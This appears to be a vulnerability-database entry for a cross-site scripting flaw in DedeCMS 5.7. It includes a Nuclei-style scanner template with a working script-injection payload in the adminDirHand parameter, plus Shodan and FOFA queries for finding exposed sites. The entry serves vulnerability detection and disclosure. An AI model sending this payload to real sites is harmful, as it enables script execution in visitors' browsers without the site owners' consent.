dedecms-config-xss: DedeCMS 5.7 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: DedeCMS | POC: 已公开

漏洞描述

DeDeCMS 5.7 contains a cross-site scripting vulnerability in the '/include/dialog/config.php' file. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. shodan: http.html:"DedeCms" fofa: app="DedeCMS"

PoC代码[已公开]

id: dedecms-config-xss

info:
  name: DedeCMS 5.7 - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    DeDeCMS 5.7 contains a cross-site scripting vulnerability in the '/include/dialog/config.php' file. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
  reference:
    - https://www.zilyun.com/8665.html
    - https://www.60ru.com/161.html
    - https://www.cnblogs.com/milantgh/p/3615853.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
    cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"DedeCms"
    product: dedecms
    vendor: dedecms
  tags: dedecms,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "location='../../</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100def2c15ab8b0e17ed1b4422d7d6d4f317554151c8503af83fa9f3c5a8f7ddfd3022100e326a3999ba520b4c9b5effc3f293c0bb92a09313a7e03b34725b6a5685bbc40:922c64590222798bb761d5b6d8e72950

相关漏洞推荐